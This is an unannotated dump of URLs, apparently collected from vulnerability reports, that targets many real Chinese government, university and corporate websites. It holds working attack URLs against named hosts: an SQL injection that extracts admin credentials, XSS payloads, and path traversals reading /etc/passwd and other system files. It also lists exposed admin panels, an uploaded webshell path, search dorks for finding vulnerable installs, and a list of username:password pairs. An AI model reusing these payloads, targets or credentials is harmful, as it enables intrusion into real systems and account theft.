http://www.super.cn/appeal/action/appeal.txt http://zfxy.nankai.edu.cn/newsview/anounce/7247 http://economics.nankai.edu.cn/level2/ProfileNewsList.aspx?keyword=1 www.koalagogo.com/getcustomer.asp?q= http://mail.cttha.com/ http://www.cycb.com/review.do?method=col&rid=33702 www.lsol.com.cn http://www.flyhigh.com.cn http://stayliv3.github.io/2014/11/25/discuz/ http://wenku.baidu.com/static/html/v2Jump.html https://openapi.baidu.com/static/developer/html/v2Jump.html http://202.98.157.99/news/news.asp?classid=002002 http://hr1.wahaha.com.cn/fckeditor//editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp http://218.30.114.228/ http://www.scyahyez.com/Merak/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 http://www.suyaxing.com:81/Merak/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 http://www.sdwhys.com/Merak/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 http://www.lcxyz.com:21245/Merak/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 http://www.hwsyxx.com/Merak/public/asp/ErrorMsg/ShowError.asp?ErrorCode=30004 http://abroad.nenu.edu.cn/admin/login.php http://abroad.nenu.edu.cn/plus/search.php?keyword=asa&typeArr[111%3D@%60\%27%60%29+and+%28SELECT+1+FROM+%28select+count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select+CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60+limit+0,1%29,1,62%29%29%29a+from+information_schema.tables+group+by+a%29b%29%23@%60\%27%60+]=a www.biz198.cn:10180 http://www.66tx.cn/ https://210.162.133.131/cgi-bin/licenses.cgi https://192.195.154.239/cgi-bin/licenses.cgi https://91.217.172.181/cgi-bin/licenses.cgi https://74.219.78.212/cgi-bin/licenses.cgi https://202.147.192.101/cgi-bin/licenses.cgi https://202.147.192.101/cgi-bin/licenses.cgi https://64.62.143.195/cgi-bin/licenses.cgi https://202.147.192.105/cgi-bin/licenses.cgi https://61.120.197.38/cgi-bin/licenses.cgi https://124.93.238.176/cgi-bin/licenses.cgi https://12.219.233.49/cgi-bin/licenses.cgi https://192.195.154.243/cgi-bin/licenses.cgi https://192.195.154.242/cgi-bin/licenses.cgi https://199.26.202.34/cgi-bin/licenses.cgi https://91.217.172.227/cgi-bin/licenses.cgi https://91.217.172.230/cgi-bin/licenses.cgi https://58.65.0.250/cgi-bin/licenses.cgi https://64.62.143.195/cgi-bin/licenses.cgi https://72.22.9.20/cgi-bin/licenses.cgi https://72.22.9.20/cgi-bin/licenses.cgi https://12.14.47.76/cgi-bin/licenses.cgi https://72.22.9.20/cgi-bin/licenses.cgi https://12.14.47.76/cgi-bin/licenses.cgi https://72.22.9.21/cgi-bin/licenses.cgi https://202.147.192.101/cgi-bin/licenses.cgi https://91.217.172.234/cgi-bin/licenses.cgi https://137.165.4.244/cgi-bin/licenses.cgi https://195.10.115.239/cgi-bin/licenses.cgi https://219.142.74.67/cgi-bin/licenses.cgi https://81.246.0.216/cgi-bin/licenses.cgi https://202.147.192.101/cgi-bin/licenses.cgi http://mail1.coscodl.com/cgi-bin/licenses.cgi?p=system_nimda&a=LOGIN https://124.93.238.176/cgi-bin/frame.cgi?p=system_admin&a=LOGIN http://mail.infokom.net/cgi-bin/licenses.cgi?p=system_nimda&a=LOGIN http://mail1.coscodl.com/cgi-bin/licenses.cgi?p=system_nimda&a=LOGIN http://124.93.238.165/cgi-bin/licenses.cgi?p=system_nimda&a=LOGIN http://203.80.116.242/cgi-bin/licenses.cgi?p=system_nimda&a=LOGIN https://mailpr.coscodl.com/cgi-bin/licenses.cgi?p=system_nimda&a=LOGIN http://pelican.admin.ccny.cuny.edu/cgi-bin/licenses.cgi?p=system_nimda&a=LOGIN https://124.93.238.176/cgi-bin/frame.cgi?p=system_admin&a=LOGIN http://mail.infokom.net/cgi-bin/licenses.cgi https://124.93.238.176/cgi-bin/licenses.cgi http://124.93.238.165/cgi-bin/licenses.cgi http://203.80.116.242/cgi-bin/licenses.cgi https://mailpr.coscodl.com/cgi-bin/licenses.cgi http://pelican.admin.ccny.cuny.edu/cgi-bin/licenses.cgi http://webapp.scjst.gov.cn:88/MCreditSC/EntApprove/scMain/CEINLogin.aspx http://webapp.scjst.gov.cn:88 http://www.rftgd.gov.cn/stgl/index.php http://www.rftgd.gov.cn/stgl/view.php?id=22 http://www.gylr.gov.cn/news.aspx?i=12122 http://www.baidu.com http://www.baidu.com http://dckf.digitalchina.com//index.php/point/login http://esf.sina.com.cn/ http://broker.esf.sina.com.cn/login/findpassword http://www.wanxinsoft.com/ http://foodbioeng-lab.xzit.edu.cn/model/TwoGradePage/TrainSignUp.aspx?tblApparatusRepertoryListID=46259 http://aacc.cumt.edu.cn/model/twogradepage/TrainSignUp.aspx?tblApparatusRepertoryListID=46285 http://sys.zafu.edu.cn/dy/model/TwoGradePage/TrainSignUp.aspx?tblApparatusRepertoryListID=46259 http://labch.cumt.edu.cn:81/model/TwoGradePage/TrainSignUp.aspx?tblApparatusRepertoryListID=46259 http://clpt.ecust.edu.cn/model/TwoGradePage/TrainSignUp.aspx?tblApparatusRepertoryListID=46259 http://qc.legendsec.com http://qc.legendsec.com/jmx-console/ sqlmap:python http://hz.jlfzg.com:6372/booking/bookingAction!hotelIndex.action http://118.244.158.17:81/Account/UserList http://www.hebxxt.com/yxt/jz_login.htm http://www.crcg.com.cn/ http://180.149.157.110/home/App http://180.149.157.110/home/App http://cyn.changyou.com/cyouApp/versionAdmin/downloadPage.shtml http://cyn.changyou.com/cyouApp/ http://cyn.changyou.com/cyouApp/advise/getAdviseList.shtml?vo.email=&page=1&rows=20&sort=id&order=desc&vo.appVersion=1.0.6 http://lib.mnu.cn/gdweb/AdvicesRequest.aspx?DBKey=20004 http://59.64.81.245/gdweb/AdvicesRequest.aspx?DBKey=20004 http://library.sptpc.com:8080/gdweb/AdvicesRequest.aspx?DBKey=20004 http://lib.cumtb.edu.cn/fsweb/AdvicesRequest.aspx?DBKey=20004 http://duirap7.uir.cn/gdlibweb/AdvicesRequest.aspx?DBKey=20004 http://211.80.179.195/AdvicesRequest.aspx?DBKey=20004 http://opac.syphu.edu.cn:8080/AdvicesRequest.aspx?DBKey=20004 http://library.scac.edu.cn/jpweb/AdvicesRequest.aspx?DBKey=20004 http://library.sptpc.com:8080/gdweb/AdvicesRequest.aspx?DBKey=20004 https://issues.apache.org/jira/secure/Dashboard.jspa https://issues.apache.org/jira/secure/Signup!default.jspa http://www.cshr.com.cn/csrcwhr/planning/MagazineWeeklySearch.aspx?key=1 http://hbmt.hisense.com/ http://hbmt.hisense.com/cn/feedback.aspx http://hbmt.hisense.com/manage/ http://hbmt.hisense.com/manage/website/ http://ioa.hisense-plaza.com/login/Login.jsp http://ioa.hisense-plaza.com/login/Login.jsp http://weihui.yy.com/invite?app=MTQ%3D&uid=MzIxMzg2MDM3OA%3D%3D&by=d3hfY2lyY2xl&from=timeline&isappinstalled=0 http://weihui.yy.com inurl:bmtd.do http://hxasc.cn/bmtd.do?method=dept&deptid=00942001X http://218.201.232.67:8080/bmtd.do?method=dept&deptid=009550324 http://www.yjxzfw.com.cn/bmtd.do?method=dept&deptid=009568516 http://www.gygxzw.gov.cn:8066/bmtd.do?method=dept&deptid=73098219X http://www.tlsp.net/bmtd.do?method=dept&deptid=001190440 http://www.sinanxzfw.gov.cn/bmtd.do?method=dept&deptid=009566449 http://www.yjxzfw.com.cn/bmtd.do?method=dept&deptid=009568516 http://www.gygxzw.gov.cn:8066/bmtd.do?method=dept&deptid=73098219X http://www.tlsp.net/bmtd.do?method=dept&deptid=001190440 http://58.42.249.116/bmtd.do?method=dept&deptid=429280359 http://218.201.232.67:8080/bmtd.do?method=dept&deptid=009550324 http://hxasc.cn/bmtd.do?method=dept&deptid=00942001X http://jc.dlxg.gov.cn/bmtd.do?method=dept&deptid=d6e101334862aafd01dd http://jjjc.sqxz.gov.cn/bmtd.do?method=dept&deptid=750177518 http://119.1.108.246/bmtd.do?method=dept&deptid=009618288 http://58.42.241.14:6778/bmtd.do?method=dept&deptid=00941049x http://119.1.108.246/bmtd.do?method=dept&deptid=009618421 http://home2.xywy.com:80/jkgl.php?type=doc_list&page=2 http://zhongyi.sina.com/,登录随便一个账户 http://www.wyidai.com/list/list_zyfw.php?category=487 http://219.142.55.69:8080/400sys/index.jsp http://219.142.55.69:8080/400sys/x.jsp http://219.142.55.69:8080/400sys/login.do http://219.142.55.69:8080/400sys/400sys/number_available.do http://219.142.55.69:8080/400sys/index.jsp http://cs.hn96531.com/manage/login/login.aspx www.hismarttv.com/getTopicAppById.jhtml?deviceCode=1&deviceType=003&topicId=9000005114762 www.hismarttv.com/getTopicAppById.jhtml?deviceCode=1&deviceType=003&topicId=9000005114762 http://apf.umeng.com/apf/public/test.jsp encap:Ethernet addr:211.151.139.213 Bcast:211.151.139.255 Mask:255.255.255.192 MTU:1500 packets:468325720 packets:11000645 txqueuelen:1000 http://www.enetedu.com/index.php/Public/noticeDetail?id=1146 http://www.enetedu.com/index.php/Event/teachSalonInter?id=146 http://www.enetedu.com/index.php/Event/salonAn?ids=999 http://www.enetedu.com/index.php/Event/teachVotingC?id=14143 http://www.enetedu.com/index.php/Event/teachCourseWareQ?id=14083 http://www.enetedu.com/index.php/Event/teachEssayE?id=701 http://www.enetedu.com/index.php/Center/centerDetail?id=19 http://www.enetedu.com/index.php/Course/courseDetail?id=742 http://sms.womai.com/login.aspx http://sms.womai.com/log.txt inurl:showfwly.asp?id= http://www.dbawx.com/showfwly.asp?id=51 http://www.lsayy.com/showfwly.asp?id=34 http://www.huangganglawyer.com/showfwly.asp?id=31 http://www.yangdafei.com/showfwly.asp?id=49 http://shweikuo.com/showfwly.asp?id=52 http://www.sdzzsx.com/showfwly.asp?id=22 http://www.gdzhfl.com/showfwly.asp?id=47 http://www.shweikuo.com/showfwly.asp?id=57 http://dzthpg.com/showfwly.asp?id=48 http://218.95.46.68/slx/01/showfwly.asp?id=49 http://www.lnqylaw.com/showfwly.asp?id=35 http://lnqylaw.com/showfwly.asp?id=46 http://xqxlzx.com/showfwly.asp?id=44 http://www.xzlawcn.com/showfwly.asp?id=23 http://www.fzybfc.com/showfwly.asp?id=43 http://lycareer.com/showfwly.asp?id=57 http://jshbls.com/showfwly.asp?id=27 http://www.jinshunsw.com/showfwly.asp?id=53 http://cdzyk.com/showfwly.asp?id=35 http://www.feiyingsw.com/showfwly.asp?id=49 http://hbmt.hisense.com/cn/product.aspx?ClassID=z8UwZwanMEg%3d&length= www.2925.com http://zhongyi.sina.com/login.html angel:123456 anita:123456 cherish:123456 cherry:123456 gan:123456 jasmine:123456 lian:123456 winni:123456 yolanda:yolanda michael:zxcvbnm123 stanly:abcd1234 maxwell:123456789 viva:123456789 benjamin:a123456 carlos:a123456 dede:a123456 free:a123456 demo1:111111 hunter:123123 hello:000000 cole:000000 blair:123456qq http://zhongyi.sina.com/UIAjax/CheckValue.ashx?&value=$username http://zhongyi.sina.com/user/uiHandler/regHandler.ashx?methodName=checkUserName POST:username=$username http://www.liqunshop.com/ http://iot.189.cn http://www.yinyuetai.com/fckeditor/editor/filemanager/connectors/test.html http://aqbzh.chinasafety.gov.cn/sps/loginaction!logout.action http://xss.name/Y5JJGU http://waiqin.gdbnet.cn:8011/themes/ user:Admin@zqb0.com www.hnsip.com http://123.134.189.60:8016/bmfw/jwhzdlist.aspx?zd=218 http://61.133.119.187:8091/bmfw/jwhzdlist.aspx?zd=218 http://222.135.76.147:8200/bmfw/jwhzdlist.aspx?zd=218 http://221.2.156.181:8800/bmfw/jwhzdlist.aspx?zd=218 http://222.135.109.70:8200/bmfw/jwhzdlist.aspx?zd=218 http://221.2.149.47:8200/bmfw/jwhzdlist.aspx?zd=218 www.wooyun.org/bugs/wooyun-2010-07224 http://www.haitiansoft.com:8080/ http://180.166.7.94/VO_EmailCaoGao.asp?StartDate=8 http://oa.tjfsu.edu.cn/VO_EmailCaoGao.asp?StartDate=8 http://vos.tjufe.edu.cn/VO_EmailCaoGao.asp?StartDate=8 http://oa.ccib.com.cn/VO_EmailCaoGao.asp?StartDate=8 http://121.30.226.44/VO_EmailCaoGao.asp?StartDate=8 http://viewsonic.zol.com.cn/detail.php?id=1428 http://www.lzgjj.gov.cn/news.do?method=findChannelListjsp&channelid=170 http://login.med.wanfangdata.com.cn/Account/ForgetPassword http://login.med.wanfangdata.com.cn https://demo.emay.cn/log.txt http://www.hbgsny.com/Admin/pages/fileManager.aspx?bp= http://www.jtlth.com/bdsitemap.txt http://www.enlio.com/robots.txt http://58.32.246.97/ http://58.32.246.97/admin/index.php http://www.hicourt.gov.cn/xingsh/xingsh_list.asp?id=6 http://jwc.lcudc.cn/readnews.asp?id=139 http://jwc.lcudc.cn/admin/login.asp http://hbmt.hisense.com/cn/product.aspx?ClassID=z8UwZwanMEg%3d&Length=1.4km https://121.207.254.57/users/user_list.php?level=1%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E https://121.207.254.57/users/user_list.php?level=1 http://www.hicourt.gov.cn/xingsh/xingsh_list.asp?id=6 http://logserver.cnepay.net/#/dashboard/elasticsearch/%E4%B8%AD%E6%B1%87%E6%94%AF%E4%BB%98%E6%97%A5%E5%BF%97%E6%9F%A5%E8%AF%A2%E7%B3%BB%E7%BB%9F http://jxzy.gzxw.gov.cn/course/course_view.asp?cid=2334 http://xxxx.com/product/list.php?type_id=1,其中type_id存在多处注入漏洞。 http://192.168.0.107/brand/list.php?brand_id=1,其中brand_id存在注入漏洞 http://fortune.cib.com.cn/futures/default.jsp?team=1%29;%3C/script%3E%3Cscript%3Ealert%28121%29%3C/script%3E http://bbs.inwatch.cc/index.php?m=faq http://open.t.sdo.com/ http://www.lezhixing.com.cn/cms/lzx/case/index.jhtml http://202.108.154.209/datacenter/downloadApp/loadAppInfo.do?1414310370856&appId=f889bbb1102247d2ae00c85dbdd51ea8&versionType= http://www.dxyzzx.com/datacenter/downloadApp/loadAppInfo.do?1414310370856&appId=f889bbb1102247d2ae00c85dbdd51ea8&versionType= http://www.tzjyzb.com/datacenter/downloadApp/loadAppInfo.do?1414310370856&appId=f889bbb1102247d2ae00c85dbdd51ea8&versionType= http://www.hdsyex.com/datacenter/downloadApp/loadAppInfo.do?1414310370856&appId=f889bbb1102247d2ae00c85dbdd51ea8&versionType= http://202.108.154.209/datacenter/downloadApp/loadAppInfo.do?1414310370856&appId=f889bbb1102247d2ae00c85dbdd51ea8&versionType= http://www.dxyzzx.com/datacenter/downloadApp/loadAppInfo.do?1414310370856&appId=f889bbb1102247d2ae00c85dbdd51ea8&versionType= http://202.108.154.209//datacenter/getfile.do?path=../../../../../../../../../../etc/passwd http://www.infosea.com.cn/ http://211.86.195.15:8086/opac/hot.jsp?flh=A%25&rq=7&wxlx=zyk http://211.86.225.3:8090/opac/hot.jsp?flh=A%25&rq=7&wxlx=zyk http://218.241.174.148:8070/opac/hot.jsp?flh=A%25&rq=7&wxlx=zyk http://61.187.55.41:8090/opac/hot.jsp?flh=A%25&rq=7&wxlx=zyk http://www.kflib.cn:8089/opac/hot.jsp?flh=A%25&rq=7&wxlx=zyk http://lib.tongde.com:8089/opac/hot.jsp?flh=A%25&rq=7&wxlx=zyk http://58.133.216.9:8070/opac/hot.jsp?flh=A%25&rq=7&wxlx=zyk http://tsjs.sdwm.cn:8000/opac/hot.jsp?flh=A%25&rq=7&wxlx=zyk http://scsk.crsp.org.cn:8070/opac/hot.jsp?flh=A%25&rq=7&wxlx=zyk http://222.27.60.13/opac/hot.jsp?flh=A%25&rq=7&wxlx=zyk http://tsjs.ndjclib.com:8070/opac/hot.jsp?flh=A%25&rq=7&wxlx=zyk http://211.84.229.10:8089/opac/hot.jsp?flh=A%25&rq=7&wxlx=zyk http://tsjs.ndjclib.com:8070/opac/hot.jsp?flh=A%25&rq=7&wxlx=zyk http://211.86.225.3:8090/opac/hot.jsp?flh=A%25&rq=7&wxlx=zyk http://211.86.195.15:8086/opac/hot.jsp?flh=A%25&rq=7&wxlx=zyk http://lib.tongde.com:8089/opac/hot.jsp?flh=A%25&rq=7&wxlx=zyk inurl:index.php?g=Home&m=Index&a=help http://www.fifee.com/ http://lierk.cn/index.php?m=Index&a=login+ http://a.t2.weixinbiz.cn/index.php?m=Index&a=reg http://114.215.185.138/index.php?m=Users&a=checklogin http://wechat.lx1999.com.cn/index.php?m=Users&a=checklogin http://www.jpsbzr.com/index.php?m=Index&a=login http://www.iweichat.com/index.php?m=Index&a=login http://166u.cn/ http://wx.lefangw.cn/index.php?g=Home&m=Index&a=help http://www.perc-sinano.com/xsdt.asp?id=62 www.gd189fq.com/goods.php?id=228,wooyun上已经有人报过 http://bbs.hiwifi.com http://bbs.hiwifi.com/home.php?mod=space&uid=171650&do=profile http://bbs.mgame.baidu.com/config/config_ucenter.php,菜刀连接失败,确实被修补了 http://bbs.mgame.baidu.com/config/config_ucenter.php.bak http://bbs.mgame.baidu.com/config/config_ucenter.php.bak,密码1 www.vmaibo.com/user/userp.action http://www1.dqpi.edu.cn/qmgc/admin/Admin_Login.asp http://**.**.**/index.do http://121.199.53.253:8081/nexus/index.html http://121.199.53.253/settings.xml http://121.199.53.253/ http://121.199.53.253:8080/console http://121.199.53.253:8080/fly/html/login.html http://www.faqrobot.org/typical_case.html ip:121.199.34.83 http://218.16.125.82:8081/admin/login.asp http://124.238.218.155/ImageShowServlet?guestID=&images=../../../../../../../../../../windows/win.ini http://job.shenzhenair.com/recruitment/index/search/?area=&area_name=%E4%B8%8D%E9%99%90&company=&company_name=%E4%B8%8D%E9%99%90&employe=1&jt=39&keyword=1&systemjobtype= http://www.hjsoft.com.cn/ inurl:hireNetPortal/search_zp_position.do http://60.166.10.93:8080/pos/posbusiness/train_get_code_tree.jsp?codesetid= http://218.26.178.146:8888/pos/posbusiness/train_get_code_tree.jsp?codesetid= http://218.94.159.38:8080/pos/posbusiness/train_get_code_tree.jsp?codesetid= http://hr.bmec.net/pos/posbusiness/train_get_code_tree.jsp?codesetid= http://122.159.45.20:8888/pos/posbusiness/train_get_code_tree.jsp?codesetid= http://183.63.101.122:8999/pos/posbusiness/train_get_code_tree.jsp?codesetid= http://122.159.45.20:8888/performance/kh_plan/get_code_treeinputinfo.jsp?codesetid= http://www.pharm.com.cn:90/performance/kh_plan/get_code_treeinputinfo.jsp?codesetid= http://218.67.240.11:8081/performance/kh_plan/get_code_treeinputinfo.jsp?codesetid= http://www.pharm.cn:90/performance/kh_plan/get_code_treeinputinfo.jsp?codesetid= http://211.144.211.180:8083/performance/kh_plan/get_code_treeinputinfo.jsp?codesetid= http://zp.farmer.com.cn/performance/kh_plan/get_code_treeinputinfo.jsp?codesetid= http://61.139.52.123:8082/performance/kh_plan/get_code_treeinputinfo.jsp?codesetid= http://60.166.10.93:8080/pos/posbusiness/train_get_code_tree.jsp?codesetid= http://218.26.178.146:8888/pos/posbusiness/train_get_code_tree.jsp?codesetid= http://122.159.45.20:8888/performance/kh_plan/get_code_treeinputinfo.jsp?codesetid= http://www.pharm.com.cn:90/performance/kh_plan/get_code_treeinputinfo.jsp?codesetid= http://115.com/?mode=jianli https://113.107.199.107/ http://www.phoenixcne.de/caiji_news_list.php?category=military http://www.phoenixcne.de/head_news_content.php?news_id=133373 http://www.phoenixcne.de/guide.php?satellite_id=2 http://www.phoenixcne.de/head_news_comment.php?news_id=136676 http://www.phoenixcne.de/recom_comment.php?recom_id=243 http://tv.coocaa.com/orderInfo/getAdd.html url:http://traffic.sun0769.com/kccx/default.asp?start= http://zfzx.cug.edu.cn/ http://zfzx.cug.edu.cn/ArticleShow.asp?ID=102 http://zfzx.cug.edu.cn/ArticleShow.asp?ID=102’ http://zfzx.cug.edu.cn/ArticleShow.asp?ID=102 http://zfzx.cug.edu.cn/ArticleShow.asp?ID=102 http://zfzx.cug.edu.cn/ArticleShow.asp?ID=102 http://zfzx.cug.edu.cn/ArticleShow.asp?ID=102 inurl:bmtd.do http://jjjc.sqxz.gov.cn/spcode.do?bsnum=522224775340465004-000 http://58.42.241.14:6778/spcode.do?bsnum=522224775340465004-000 http://www.gygxzw.gov.cn:8066/bszn.do?sxbh=52011573098219X002&sxzxbh=004 www.tlsp.net/bszn.do?sxbh=211200001190440007&sxzxbh=000 http://222.135.109.70:8200/hnzc.aspx?CountryName=%e6%96%87%e7%99%bb%e5%b8%82&level=1 http://61.133.119.187:8091/hnzc.aspx?CountryName=%e9%ab%98%e6%8a%80%e5%8c%ba&level=1 http://218.56.159.98:8001/hnzc.aspx?CountryName=%e8%8e%92%e5%8e%bf&level=0 http://218.56.40.229:8001/hnzc.aspx?CountryName=%e7%83%9f%e5%8f%b0%e5%b8%82&level=0 http://218.58.124.131:8003/hnzc.aspx?CountryName=%e9%ab%98%e6%96%b0%e5%8c%ba&level=0 http://60.217.72.17:7081/hnzc.aspx?CountryName=%e7%ab%a0%e4%b8%98%e5%b8%82&level=0 http://123.134.189.60:8016/hnzc.aspx?CountryName=%e8%8e%b1%e8%8a%9c%e5%b8%82&level=0 http://222.134.154.214:8001/hnzc.aspx?CountryName=%e5%8d%97%e9%ba%bb%e9%95%87&level=2 http://221.2.149.47:8200/hnzc.aspx?CountryName=%e5%a8%81%e6%b5%b7%e5%b8%82&level=0 http://222.135.76.147:8200/hnzc.aspx?CountryName=%e8%8d%a3%e6%88%90%e5%b8%82&level=1 http://221.2.171.59:8200/hnzc.aspx?CountryName=%e7%bb%8f%e6%8a%80%e5%8c%ba&level=1 www.grasp.com.cn http://system.fastexpress.com.cn http://system.fastexpress.com.cn/Ftp/Notice/2014-07-01/ http://www.kf5.com/product/tour/ https://wooyun.kf5.com/ http://staff.chinac.com/forum.php http://srm.mindray.com/login/index.action http://dfzc.dfac.com:8091/dfpc/login.action http://fsop.caac.gov.cn/les/License/mod/addList.jsp?pilot_id=32 http://**.**.**/goods/listcid=9&b=46 http://dz.basbus.cn/account/find http://jjnsg.com/op/htmledit/admin_login.asp http://jjnsg.com/op/htmledit/db/ewebeditor.mdb http://jjnsg.com/op/htmledit/UploadFile/2014113022373124.asa(请自行删除) http://www.ickey.cn/box/www/ http://www.ickey.cn/box/www/admin http://www.ickey.cn/box/www/admin/account-settings-database.php http://www.baidu.com/home/xman/data/xcardget?id=10&get=user http://www.lecai.com/user/cooperator/baidu/card_login.php?referer=http%3A%2F%2Fwww.lecai.com%2Fuser%2Forder%2Fwin%2F%3FagentId%3D5881 http://www.lecai.com/user/cooperator/baidu/card_login.php?referer=http%3A%2F%2Fwww.lecai.com%2Fuser%2Fmylottery%2F%3FagentId%3D5881&bd_info=......&bd_sign=......&bd_appid=2490867&bd_bind=true http://113.31.31.153:28017/ http://hcms.hit.edu.cn/trans/read_news.php?NEWS_ID=187 http://220.181.185.228/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1 http://220.181.185.229/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1 http://220.181.154.180/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1 http://220.181.154.181/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1 http://220.181.154.202/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1 http://220.181.154.203/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1 https://moa.10086.cn https://moa.10086.cn/../../../../../../../../../etc/hosts http://211.139.80.193/login.jsp http://hao.lenovo.com.cn/mps/wei_xs/wei_xs_ajax.php?id=1 http://219.135.157.130/HomePageOut/showListBAction.action http://www.foreveross.com/portal-Portal-getPortalInfo.action https://vendor.wanda.cn/tender/TMX/TenderNoticeDetail.aspx?keyid= http://www.dzjw.gov.cn/xjxc/view.asp?id=107 http://55z.xhqedu.gov.cn http://xcj.xhqedu.gov.cn http://xgh.xhqedu.gov.cn http://xhyey.xhqedu.gov.cn http://zxl.xhqedu.gov.cn http://19z.xhqedu.gov.cn http://jsj.xhqedu.gov.cn http://xcj.xhqedu.gov.cn http://hz.xhqedu.gov.cn http://lml.xhqedu.gov.cn http://zxx.xhqedu.gov.cn http://tjl.xhqedu.gov.cn http://zxx.xhqedu.gov.cn http://xsj.xhqedu.gov.cn http://55z.xhqedu.gov.cn http://xxj.xhqedu.gov.cn http://wj.xhqedu.gov.cn http://lmk.xhqedu.gov.cn http://xsj.xhqedu.gov.cn http://20z.xhqedu.gov.cn http://xwa.xhqedu.gov.cn http://54z.xhqedu.gov.cn http://18z.xhqedu.gov.cn http://hx.xhqedu.gov.cn http://lml.xhqedu.gov.cn http://sy.xhqedu.gov.cn http://tyl.xhqedu.gov.cn http://tyl.xhqedu.gov.cn http://hx.xhqedu.gov.cn http://xy.xhqedu.gov.cn http://18z.xhqedu.gov.cn http://xwy.xhqedu.gov.cn http://sy.xhqedu.gov.cn http://xwy.xhqedu.gov.cn http://tjl.xhqedu.gov.cn http://54z.xhqedu.gov.cn http://xy.xhqedu.gov.cn http://19z.xhqedu.gov.cn http://jsj.xhqedu.gov.cn http://zxl.xhqedu.gov.cn http://xgh.xhqedu.gov.cn http://xhyey.xhqedu.gov.cn http://zxl.xhqedu.gov.cn http://19z.xhqedu.gov.cn http://jsj.xhqedu.gov.cn http://xcj.xhqedu.gov.cn http://18z.xhqedu.gov.cn http://tjl.xhqedu.gov.cn http://wz.xhqedu.gov.cn http://sy.xhqedu.gov.cn http://55z.xhqedu.gov.cn http://zxl.xhqedu.gov.cn http://lml.xhqedu.gov.cn http://hz.xhqedu.gov.cn http://lml.xhqedu.gov.cn http://zxx.xhqedu.gov.cn http://tjl.xhqedu.gov.cn http://55z.xhqedu.gov.cn http://zxx.xhqedu.gov.cn http://xsj.xhqedu.gov.cn http://55z.xhqedu.gov.cn http://xxj.xhqedu.gov.cn http://wj.xhqedu.gov.cn http://lmk.xhqedu.gov.cn http://xsj.xhqedu.gov.cn http://20z.xhqedu.gov.cn http://xwa.xhqedu.gov.cn http://54z.xhqedu.gov.cn http://18z.xhqedu.gov.cn http://hx.xhqedu.gov.cn http://lml.xhqedu.gov.cn http://sy.xhqedu.gov.cn http://tyl.xhqedu.gov.cn http://tyl.xhqedu.gov.cn http://hx.xhqedu.gov.cn http://xy.xhqedu.gov.cn http://18z.xhqedu.gov.cn http://xwy.xhqedu.gov.cn http://sy.xhqedu.gov.cn http://xwy.xhqedu.gov.cn http://tjl.xhqedu.gov.cn http://54z.xhqedu.gov.cn http://xy.xhqedu.gov.cn http://55z.xhqedu.gov.cn http://xcj.xhqedu.gov.cn http://xgh.xhqedu.gov.cn http://xhyey.xhqedu.gov.cn http://zxl.xhqedu.gov.cn http://19z.xhqedu.gov.cn http://jsj.xhqedu.gov.cn http://xcj.xhqedu.gov.cn http://hz.xhqedu.gov.cn http://lml.xhqedu.gov.cn http://zxx.xhqedu.gov.cn http://tjl.xhqedu.gov.cn http://zxx.xhqedu.gov.cn http://xsj.xhqedu.gov.cn http://55z.xhqedu.gov.cn http://xxj.xhqedu.gov.cn http://wj.xhqedu.gov.cn http://lmk.xhqedu.gov.cn http://xsj.xhqedu.gov.cn http://20z.xhqedu.gov.cn http://xwa.xhqedu.gov.cn http://54z.xhqedu.gov.cn http://18z.xhqedu.gov.cn http://hx.xhqedu.gov.cn http://lml.xhqedu.gov.cn http://sy.xhqedu.gov.cn http://tyl.xhqedu.gov.cn http://tyl.xhqedu.gov.cn http://hx.xhqedu.gov.cn http://xy.xhqedu.gov.cn http://18z.xhqedu.gov.cn http://xwy.xhqedu.gov.cn http://sy.xhqedu.gov.cn http://xwy.xhqedu.gov.cn http://tjl.xhqedu.gov.cn http://54z.xhqedu.gov.cn http://xy.xhqedu.gov.cn http://19z.xhqedu.gov.cn http://jsj.xhqedu.gov.cn http://zxl.xhqedu.gov.cn http://xgh.xhqedu.gov.cn http://xhyey.xhqedu.gov.cn http://zxl.xhqedu.gov.cn http://19z.xhqedu.gov.cn http://jsj.xhqedu.gov.cn http://xcj.xhqedu.gov.cn http://18z.xhqedu.gov.cn http://tjl.xhqedu.gov.cn http://wz.xhqedu.gov.cn http://sy.xhqedu.gov.cn http://55z.xhqedu.gov.cn http://zxl.xhqedu.gov.cn http://lml.xhqedu.gov.cn http://hz.xhqedu.gov.cn http://lml.xhqedu.gov.cn http://zxx.xhqedu.gov.cn http://tjl.xhqedu.gov.cn http://55z.xhqedu.gov.cn http://zxx.xhqedu.gov.cn http://xsj.xhqedu.gov.cn http://55z.xhqedu.gov.cn http://xxj.xhqedu.gov.cn http://wj.xhqedu.gov.cn http://lmk.xhqedu.gov.cn http://xsj.xhqedu.gov.cn http://20z.xhqedu.gov.cn http://xwa.xhqedu.gov.cn http://54z.xhqedu.gov.cn http://18z.xhqedu.gov.cn http://hx.xhqedu.gov.cn http://lml.xhqedu.gov.cn http://sy.xhqedu.gov.cn http://tyl.xhqedu.gov.cn http://tyl.xhqedu.gov.cn http://hx.xhqedu.gov.cn http://xy.xhqedu.gov.cn http://18z.xhqedu.gov.cn http://xwy.xhqedu.gov.cn http://sy.xhqedu.gov.cn http://xwy.xhqedu.gov.cn http://tjl.xhqedu.gov.cn http://54z.xhqedu.gov.cn http://xy.xhqedu.gov.cn https://vendor.wanda.cn/tender/TMX/TenderNoticeList.aspx http://center.tkfy.kongzhong.com/user/get_user_server?account= http://www.zoneking.cn/ http://www.zoneking.cn/Zkuser/zkuser.html inurl:/happy/|/health/|/ardour/|/active/ http://medical.cyszxyy.com:8080/happy/index.asp http://www.syyyy.cn:82/happy/index.asp http://www.kqtjzx.com/happy/index.asp http://tjzx.bydsfy.com/happy/index.asp http://itha.nmciq.gov.cn/happy/index.asp http://tjzx.hzch.gd.cn/happy/index.asp 